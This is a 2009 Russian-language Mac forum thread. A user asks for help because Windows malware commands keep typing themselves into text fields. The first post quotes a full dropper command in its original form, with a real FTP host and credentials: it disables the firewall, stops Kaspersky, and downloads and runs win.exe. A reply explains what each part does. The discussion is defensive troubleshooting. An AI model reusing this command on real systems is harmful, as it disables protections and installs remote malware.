MacCentre
Форум: Mac и Mac OS X
Тема: Товарищи, бяка самопечатающаяся
Страницы: [1] 2 3
[Ответить]
dalf-ezh [03.07.2009 20:36] Товарищи, бяка самопечатающаяся:
lEdition Classic Guard" &netsh firewall set opmode disable &net stop kavsvc &echo open 74.208.169.143 21 > ox &echo user u52877190-dd ddddddd >> ox &echo binary >> ox &echo get win.exe >> ox &echo bye >> ox &ftp -n -v -s:ox &del ox &win.exe &exit
Товарищи, вот это иногда в открытых для ввода текста окошках пишет. А где нет открытых окошек - просто тормозит мышь и попытки обратиться к окошкам, пока не допечатает. Поставил clamaxv, он следов дряни не нашел. Где может быть зарыта? Это тока вторая часть бяки, первая русским фонтом написалась.
Макосьикс, люминиевый мак.
Помогите, задрало уже немножко...
namreeb [03.07.2009 20:57] :
Сильно на скрипт смахивает. Советую искать не вирус, а трояна
Напрягите память, чтоб вспомнить когда началось. Crossover случайно не установлен?
dalf-ezh [03.07.2009 21:14] :
понимаю, что на троян больше похоже. Crossover - что такое?
dalf-ezh [03.07.2009 21:16] :
а началось - файлик по почте пришедший открыл вордовский, как мне кажется.
namreeb [03.07.2009 21:28] :
посмотрите процессы на компе. но если тупо то:
netsh firewall set opmode disable - вырубить firewall
net stop kavsvc - остановить касперского
open 74.208.169.143 21 открыть ftp c перенаправлением.. ну и т.д.
но это все для выни!
найдите процесс, что пытается это сделать и убейте его. на маке он не отработает, но раз умудрился запуститься.. то чтот его запустило?
Crossover - это типа хрень для запуска выньдовых прог на маке
dalf-ezh [03.07.2009 21:34] :
нет, мак чистый, без запуска виндовых прог.
Как мне можно хронологически или еще как-то узнать, что это был за процесс? Последние использованные проги из файндера ничего не показывают.
namreeb [03.07.2009 21:44] :
надо смотреть процессы!
файдер показывает то, что он сам запускал или что ему об этом сообщило..
вообще это бред - на маке нет команд netsh и net. и выньдовые скрипты он не запустит - он их не поймет
вы бы огласили, че у вас там
по моему это шутка пятничная..
dalf-ezh [03.07.2009 21:51] :
фига, неделю уже самозапускается. То есть команды, которые этот макрос-скрипт выдает, для мака, конечно, фейковые, а вот на сам запуск скрипта мак не реагирует.
dalf-ezh [03.07.2009 21:53] :
Ну оглашаю, самому интересно.
Винды нет, Буткэмпа или еще каких извращений нет.
Корзина очищена.
Поиск по созданным или модифицированным файлам из файндера ничего не дает.
Где еще посмотреть?
namreeb [03.07.2009 22:14] :
dalf-ezh писал(а):
Товарищи, вот это иногда в открытых для ввода текста окошках пишет.
Даже не понятно, что за окошки
dalf-ezh писал(а):
Ну оглашаю, самому интересно.
Винды нет, Буткэмпа или еще каких извращений нет.
уже не верю
dalf-ezh писал(а):
Поиск по созданным или модифицированным файлам из файндера ничего не дает
а что он должен дать?
dalf-ezh писал(а):
Где еще посмотреть?
namreeb писал(а):
надо смотреть процессы!
кароче усе ясно.
cu
[Ответить]
[Вперед >]